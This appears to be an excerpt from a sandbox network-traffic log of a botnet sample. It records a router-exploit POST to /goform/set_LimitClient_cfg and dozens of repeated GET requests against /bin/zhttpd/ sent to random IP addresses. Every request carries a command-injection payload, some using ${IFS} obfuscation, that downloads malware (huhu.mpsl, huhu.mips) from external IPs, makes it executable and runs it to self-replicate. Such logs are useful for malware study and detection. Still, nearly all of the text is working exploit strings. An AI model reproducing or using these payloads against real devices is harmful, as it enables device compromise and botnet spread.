                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:04:07.402090073 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              712192.168.2.1455738204.162.123.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:32.700546980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              713192.168.2.1450528193.12.49.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:32.700601101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              714192.168.2.144725425.202.1.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:33.704051018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              715192.168.2.14330688.83.214.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:33.704102993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              716192.168.2.1438598156.25.108.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:33.704157114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              717192.168.2.1444756202.203.96.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:33.704194069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              718192.168.2.1449446168.108.32.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.721515894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              719192.168.2.143394644.165.200.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.721548080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              720192.168.2.1438638155.28.230.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.721570015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              721192.168.2.1447342141.120.198.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.721616983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              722192.168.2.1435454151.189.18.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.721672058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              723192.168.2.1442760148.234.2.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.721723080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              724192.168.2.1453878198.105.55.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.721729994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              725192.168.2.1450600151.54.30.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.721772909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              726192.168.2.1436840126.71.124.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.721800089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              727192.168.2.144867441.54.69.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.721848965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              728192.168.2.1446296222.25.229.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.721910000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              729192.168.2.144454825.51.72.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.721914053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              730192.168.2.145841681.87.253.125443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.721960068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              731192.168.2.1455984116.170.163.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.721997976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              732192.168.2.14491682.176.63.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.722059965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              733192.168.2.143937842.206.29.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.722083092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              734192.168.2.144765449.176.67.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.722109079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              735192.168.2.144367684.10.197.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.722134113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              736192.168.2.144006246.38.75.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.722168922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              737192.168.2.144283063.224.199.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.722214937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              738192.168.2.143651681.152.46.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.722254038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              739192.168.2.14487289.172.137.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.722292900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              740192.168.2.1444342128.158.106.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.722349882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              741192.168.2.1460176126.170.254.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.722381115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              742192.168.2.1448372145.3.33.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.722430944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              743192.168.2.1435332118.67.142.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.722460985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              744192.168.2.144454643.28.99.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.722491980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              745192.168.2.1439510126.16.158.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.722516060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              746192.168.2.144787017.77.45.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.722568989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              747192.168.2.1434094203.38.114.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.722596884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              748192.168.2.1446204113.170.234.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.722629070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              749192.168.2.1442584131.89.0.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.722672939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              750192.168.2.144712620.187.133.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.722697973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              751192.168.2.143367637.191.119.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.722726107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              752192.168.2.145255637.83.113.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.722779036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              753192.168.2.14495365.23.226.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.722834110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              754192.168.2.143929683.151.99.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.722867012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              755192.168.2.145673073.111.131.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.722902060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              756192.168.2.1457584197.53.177.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.722932100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              757192.168.2.1432872135.186.20.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.722974062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              758192.168.2.1450110194.169.66.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.723017931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              759192.168.2.1459898140.248.30.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.723052025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              760192.168.2.145797287.246.37.163443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.723088980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              761192.168.2.1435016220.234.92.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.723133087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              762192.168.2.1442098139.147.96.217443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.723160028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              763192.168.2.144781035.156.101.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.723186016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              764192.168.2.1439196142.191.121.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.723226070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              765192.168.2.1458626125.126.168.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.723273993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              766192.168.2.143295486.98.115.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.723311901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              767192.168.2.1452118191.114.173.180443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.723339081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              768192.168.2.1451604109.174.216.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.723397970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              769192.168.2.1448760128.34.93.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.723422050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              770192.168.2.1433282135.166.49.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.723541021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              771192.168.2.1459896143.213.79.64443
                                              TimestampBytes transferredDirectionData
